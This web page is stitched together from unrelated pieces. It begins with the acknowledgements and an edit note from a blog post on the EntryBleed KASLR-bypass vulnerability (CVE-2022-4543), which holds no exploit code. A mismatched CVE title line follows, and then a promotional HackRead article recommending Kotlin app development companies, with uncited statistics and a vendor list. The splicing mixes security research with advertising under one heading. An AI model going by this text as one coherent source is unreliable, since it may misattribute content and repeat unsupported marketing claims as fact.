I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.

CVE-2022-4543: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

By Owais Sultan
Find out what Kotlin app development will bring to your company, which global giants have already taken advantage…
This is a post from HackRead.com Read the original post: Kotlin app development company – How to choose

Find out what Kotlin app development will bring to your company, which global giants have already taken advantage of it, and how to choose a reliable Kotlin app development company.

**How to Choose Kotlin App Development Company?**

Choosing the right tech stack is the key to ensuring your digital solution keeps up with the times, i.e., meets current trends and satisfies consumer needs. By “right,” we mean advanced tools that allow you to create high-performance, functional and easily scalable software.

Kotlin can be safely attributed to the list of such programming languages and the companies that work with it to the promising suppliers of software products in today’s market. 

Today we’ll talk about why Kotlin is so in demand with developers and their clients and discuss why it’s so important to choose a reliable Kotlin app development company.

**All You Need To Know About Kotlin**

Kotlin is an object-oriented programming language with static typing that was created more than 10 years ago and was originally considered an alternative to Java. However, its creators have made it so compact, convenient, and versatile that it has surpassed in popularity both Java and other equally popular languages, like JavaScript, Ruby, and C++. 

In addition to its popularity among programmers, Kotlin is trusted by the world’s IT industry flagships. Jira, Adobe, Reddit, Twitter, Netflix, and many others have adopted it. Most of the most popular programs on the Play Market are written in it, and Google even declared it the preferred language for Android development. 

Note the reasons why you should find a reliable Kotlin app development company now:

1.  **The demand for this language among successful companies.** According to statistics, many well-known corporations plan to migrate their digital solutions to Kotlin by the end of 2022. Uber and Pinterest are among those that have already done so.
2.  **Compliance with modern software requirements.** Kotlin allows you to write 40% less code than Java. This helps teams achieve one of their main goals: get the finished product to market faster. Other benefits include writing error-free code and creating easily scalable digital products. It is also handy for Data Science, including creating machine learning models.
3.  **Versatility of language.** Kotlin’s creators claim that “Kotlin is a language for all platforms.” That is, it can be used to write digital solutions for mobile and smart devices (e.g., Android, iOS, WatchOS) and desktop apps for macOS, Windows, Linux, etc. You can also order the development of a cross-platform product. This is possible thanks to Multiplatform technology, the benefits of which have already been used by many global giants, including Netflix, Baidu, and PlanGrid.

Enough arguments in favour of Kotlin software development, right? Let’s discuss what to look for when choosing a company that specializes in creating Kotlin apps.

**Kotlin Developer Selection Criteria **

When choosing a Kotlin app development company, pay attention to the reputation of the provider itself, as well as the performance of the individual developers it works with. Below are three parameters by which we recommend evaluating the professionalism of Kotlin developers:

**1: Hands-on experience.** The skills of the developer who will be involved in your project should not be limited to theory. A good specialist must have practical experience in writing different types of apps in this and other languages, as well as a good understanding of object-oriented programming, web service concepts, and mobile solution architecture. 

**2: Tech stack.** According to statistics, 92% of developers wrote code in Java before switching to Kotlin. Of these, 86% continue to program in Java in parallel with Kotlin, and among other tools that are popular with these programmers are JavaScript, SQL, and HTML/CSS. Consequently, knowledge of this technology stack will be one of the first hard skills to test when selecting a candidate. 

Another important point is a thorough understanding of XML markup language, as it is necessary for the layout of a mobile and web solution. We should also not forget about Android tools because the priority area of using Kotlin is still mobile development.

**3: Personality traits.** No matter how first-rate a developer is, they will not benefit your company if they do not know how to work in a team and do not possess other important soft skills. When choosing a programmer, look for these qualities: 

*   research skills;
*   ability to adapt;
*   ability to manage time;
*   the desire for self-development;
*   ability to defend their own position.

To avoid making a mistake with a Kotlin-development service provider, turn only to proven companies with extensive market experience, a positive reputation, and an impressive portfolio with successful cases.

**Top 5 Kotlin App Development Companies**

Are you looking for the best developers to implement your project? Here is a list of time-tested Kotlin app development companies.

**\-> Brights**

Brights is a company that has been developing digital solutions for clients worldwide for 11 years. Their agile team of 100 people specializes in creating fintech startups and developing enterprise software. They are not afraid of the responsibility of implementing bold solutions and provide a full range of services, from hypothesis testing to testing, release, and subsequent optimization of a full-fledged digital product.

Services provided:

*   Web Development.
*   Mobile solution creation.
*   UI/UX design.
*   QA testing.
*   Machine Learning.
*   DevOps security.

Distinguishing features:

*   comprehensive software development services;
*   creation of digital solutions within the agreed time and budget;
*   the use of advanced technologies and tools;
*   high-quality communication with the customer.

**\-> Concetto Labs**

Working for seven years on the market, Concetto Labs Agile team has managed to implement more than 500 successful projects. The specialists of this company specialize in Microsoft development services. They develop mobile and web software for businesses of all sizes, from small startups to large corporations.

Services provided:

*   Powerapps Development.
*   Power BI Development.
*   Power Automate Development.
*   ASP.NET Core Development.
*   Microsoft Office 365 Add-ins Development.
*   Azure Data Factory.

Distinguishing features:

*   24/7 user support;
*   competitive prices and speed of delivery;
*   flexible interaction models.

**\-> Hidden Brains **

Hidden Brains is one of the leading Kotlin software development companies. Its specialists create functional apps for Android that are distinguished by high performance. The company has worked successfully with clients from over 100 countries for 19 years.

Services provided:

*   Development of web programs.
*   Creation of apps for mobile devices.
*   Frontend development.
*   Microsoft development.
*   Digital solution prototyping.
*   Cloud technology and DevOps.

Distinguishing features:

*   broad industry expertise;
*   dedicated team of Kotlin developers;
*   experience with ML, IoT, and AI technologies;
*   experience in creating chatbots.

**\-> Techahead******

The company has been creating customer-centric and easily scalable solutions for mobile and web platforms since 2009. The Techahead team has experience working with leaders in various industries, including finance, real estate, e-commerce, insurance, and many others. 

Services provided:

*   Mobile and web development.
*   Modernization and maintenance of digital solutions.
*   Cloud engineering and IoT.
*   research and consulting.
*   UX/UI design.
*   DevOps.
*   QA and testing.
*   User analytics.
*   Digital marketing.

Distinguishing features:

*   experience working with Fortune 500 brands;
*   turnkey design and development;
*   quick adaptation to the code of the existing project when upgrading it;
*   attention to detail.

**\-> Mobiloitte******

Mobiloitte positions itself as a Blockchain and Metaverse Company that is as focused as possible on its digital products’ security, scalability, and performance. For 18 years, the company has accumulated over 4,500 successfully completed projects in its portfolio, and millions of satisfied consumers use its software products.

Services provided:

*   IoT.
*   Blockchain development.
*   Backend technologies.
*   Creation of digital products for mobile devices.
*   Artificial Intelligence and Machine Learning.
*   Audit of smart contracts.

Distinguishing features:

*   strict adherence to deadlines;
*   use of trendy technologies;
*   high quality of work and 100% customer satisfaction.

**Summarizing**

Hiring a dedicated team of Kotlin developers is a great alternative to hiring in-house specialists. It will save your budget without sacrificing the quality of the finished product or the speed of its release. Turn to a trusted software development service provider and follow global trends in digital transformation.

1.  Top 10 Things to do During Development
2.  How to Choose Tech Stack for Mobile App Development
3.  Benefits of CI/CD for Your Software Development Company
4.  How to Choose the Right Web Development Firm for Startup?
5.  Development of Corporate Apps Based on Artificial Intelligence

Tag

#google